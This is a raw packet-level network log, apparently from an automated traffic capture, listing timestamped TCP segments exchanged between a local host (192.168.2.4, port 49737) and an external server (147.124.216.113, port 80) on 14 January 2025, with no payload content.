Jan 14, 2025 08:08:11.984165907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984180927 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984194994 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984210014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984220028 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984246016 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984261036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984302998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984311104 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984334946 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984369993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984385967 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984404087 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984437943 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984455109 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984471083 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984503984 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984515905 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984555960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984603882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984605074 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984637022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984671116 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984685898 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984702110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984735966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984760046 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984767914 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984802008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984822989 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984833956 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984869003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984889030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985111952 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985161066 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985163927 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985193014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985224962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985246897 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985258102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985291958 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985311985 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985325098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985357046 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985382080 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985390902 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985421896 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985450029 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985455036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985488892 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985505104 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985522032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985553980 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985574961 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985586882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985620022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985641003 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.985651970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985686064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.985707045 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020555019 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020580053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020593882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020606995 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020622969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020636082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020649910 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020663023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020678043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020692110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020739079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020739079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020739079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020739079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020739079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020775080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020843983 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020847082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020863056 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020876884 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020890951 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.020910025 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.020952940 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021006107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021020889 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021065950 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021085024 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021107912 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021121979 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021136045 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021158934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021194935 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021334887 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021368027 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021414995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021466970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021488905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021502972 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021517038 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021529913 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021537066 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021544933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021559954 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021585941 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021739006 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021750927 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021759987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021795988 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021816969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021831036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021843910 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021857977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021862030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021872044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021883011 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.021888018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.021908998 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022224903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022245884 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022262096 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022274971 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022275925 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022293091 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022308111 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022327900 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022449970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022464991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022484064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022506952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022548914 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022562981 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022584915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022597075 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022598028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022614002 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022628069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022638083 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022641897 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022656918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022667885 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022674084 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022687912 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022689104 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022701979 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022727966 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022727966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022747040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.022751093 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.022789955 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.025695086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.025708914 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.025732040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.025741100 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.025749922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.025758028 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.025789976 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074240923 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074282885 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074306011 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074328899 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074342966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074366093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074379921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074393988 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074408054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074421883 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074423075 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074423075 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074423075 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074424028 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074444056 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074460030 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074475050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074489117 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074501991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074502945 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074501991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074520111 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074533939 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074538946 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074558973 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074579000 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074580908 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074596882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074619055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074632883 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074646950 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074656963 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074661970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074676991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074676991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074702978 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074743032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074759007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074773073 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074785948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074795961 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074800968 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074815035 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074815989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074861050 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074868917 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074883938 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074897051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074908018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074920893 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074922085 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074932098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074944019 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074944019 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074959040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074965000 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.074970007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074981928 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.074992895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075014114 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075037956 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075087070 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075092077 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075100899 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075143099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075208902 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075222969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075246096 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075261116 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075268030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075282097 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075295925 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075309992 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075316906 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075335979 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075339079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.075352907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.075387001 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111371040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111394882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111409903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111424923 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111439943 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111454010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111469030 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111483097 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111505032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111519098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111534119 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111546993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111555099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111561060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111555099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111556053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111556053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111556053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111577034 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111593008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111608028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111623049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111638069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111648083 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111648083 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111648083 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111653090 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111668110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111674070 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111682892 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111696005 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111696959 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111712933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111727953 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111730099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111743927 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111758947 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111768007 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111774921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111788034 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.111795902 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.111840010 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112590075 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112617016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112632036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112644911 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112646103 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112663984 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112679005 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112679958 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112703085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112705946 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112726927 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112751007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112761021 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112766981 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112782001 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112796068 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112804890 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112812042 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112831116 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112834930 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112844944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112849951 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112854004 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112862110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.112895966 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112917900 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.112982035 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113003016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113023996 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113032103 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113039017 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113046885 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113054037 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113086939 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113104105 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113123894 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113147020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113162041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113174915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113188982 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113190889 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113207102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113215923 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113224030 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113265038 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113321066 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113337040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113352060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113367081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113373041 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113383055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.113414049 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.113444090 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.164844990 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164860010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164874077 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164887905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164918900 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164933920 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164947987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164961100 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164975882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.164989948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.165013075 CET	80	49737	147.124.216.113	192.168.2.4
